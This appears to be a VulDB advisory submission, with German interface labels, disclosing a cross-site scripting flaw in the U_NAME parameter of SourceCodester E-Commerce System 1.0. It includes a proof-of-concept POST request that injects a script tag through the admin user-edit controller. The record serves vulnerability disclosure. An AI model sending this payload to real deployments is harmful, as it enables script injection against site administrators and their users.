Submit #103528: E-Commerce System U_NAME CROSS SITE SCRIPTINGinfo

TitelE-Commerce System U_NAME CROSS SITE SCRIPTING
BeschreibungA XSS vulnerability has been found in SourceCodester E-Commerce System 1.0, remote attackers can exploit it by sending crafted request.The vulnerable URL is /ecommerce/admin/user/controller.php?action=edit and parameter is U_NAME Below is the poc: POST /ecommerce/admin/user/controller.php?action=edit HTTP/1.1 *********************************************************************** USERID=127&deptid=&U_NAME=<script>alert('1')</script>&deptid=&U_USERNAME=craig&deptid=&U_PASS=foo1234&U_ROLE=Administrator&save=
Quelle⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html
Benutzer
 WWesleywww (UID 43117)
Einreichung20.03.2023 08:59 (vor 3 Jahren)
Moderieren22.03.2023 11:56 (2 days later)
StatusAkzeptiert
VulDB Eintrag223561 [SourceCodester E-Commerce System 1.0 controller.php?action=edit U_NAME Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Want to know what is going to be exploited?

We predict KEV entries!